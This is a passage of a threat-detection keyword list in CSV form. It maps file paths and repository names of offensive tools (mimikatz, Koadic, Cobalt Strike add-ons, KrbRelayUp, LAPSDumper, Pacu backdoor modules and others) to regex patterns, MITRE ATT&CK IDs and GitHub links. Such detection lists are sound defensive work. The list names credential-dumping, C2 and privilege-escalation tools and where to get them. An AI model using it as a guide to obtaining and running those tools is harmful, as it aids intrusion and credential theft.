TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/kiwi_passwords.yar*",".{0,1000}\/kiwi_passwords\.yar.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/klezVirus/CandyPotato*",".{0,1000}\/klezVirus\/CandyPotato.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/knqyf263/CVE-2022-0847*",".{0,1000}\/knqyf263\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","1","47","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z" "*/knx-gateway-discover.nse*",".{0,1000}\/knx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/knx-gateway-info.nse*",".{0,1000}\/knx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Koadic*",".{0,1000}\/Koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1059.005 - T1059.007 - T1021 - T1547.001 - T1055 - T1012","TA0002 - TA0005 - TA0007 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/zerosum0x0/koadic","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/koadic.git*",".{0,1000}\/koadic\.git.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Koh/*.cs*",".{0,1000}\/Koh\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*/Koppeling.git*",".{0,1000}\/Koppeling\.git.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/kost/revsocks/releases*",".{0,1000}\/kost\/revsocks\/releases.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*/KrakenMask.git*",".{0,1000}\/KrakenMask\.git.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*/krb5/*.py",".{0,1000}\/krb5\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/krb5-enum-users.nse*",".{0,1000}\/krb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/krbjack.git*",".{0,1000}\/krbjack\.git.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*/KrbRelay*",".{0,1000}\/KrbRelay.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/KrbRelayUp.git*",".{0,1000}\/KrbRelayUp\.git.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*/krbrelayx*",".{0,1000}\/krbrelayx.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*/KRBUACBypass*",".{0,1000}\/KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*/kronos.profile*",".{0,1000}\/kronos\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/kubesploit.git*",".{0,1000}\/kubesploit\.git.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*/Kubestroyer.git*",".{0,1000}\/Kubestroyer\.git.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*/L0ading-x/cve-2022-23131*",".{0,1000}\/L0ading\-x\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","1","N/A","N/A","1","25","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" "*/laconicwolf/burp-extensions*",".{0,1000}\/laconicwolf\/burp\-extensions.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*/Ladon.go*",".{0,1000}\/Ladon\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon.ps1*",".{0,1000}\/Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon.py*",".{0,1000}\/Ladon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon/Ladon.*",".{0,1000}\/Ladon\/Ladon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon/obj/x86*",".{0,1000}\/Ladon\/obj\/x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/LadonGo/*",".{0,1000}\/LadonGo\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/lambda__backdoor_new_roles*",".{0,1000}\/lambda__backdoor_new_roles.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/lambda__backdoor_new_sec_groups*",".{0,1000}\/lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/lambda__backdoor_new_users*",".{0,1000}\/lambda__backdoor_new_users.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/LambdaLooter.py*",".{0,1000}\/LambdaLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/lanattacks/*",".{0,1000}\/lanattacks\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/laps.py *--ldapserver*",".{0,1000}\/laps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/laps.py *-u * -p *",".{0,1000}\/laps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/laps.py*",".{0,1000}\/laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/laps_dump_*.txt*",".{0,1000}\/laps_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/LAPSDumper.git*",".{0,1000}\/LAPSDumper\.git.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/lastpass.py*",".{0,1000}\/lastpass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/Lateral/SMB.cs*",".{0,1000}\/Lateral\/SMB\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/lateral_movement/*",".{0,1000}\/lateral_movement\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is 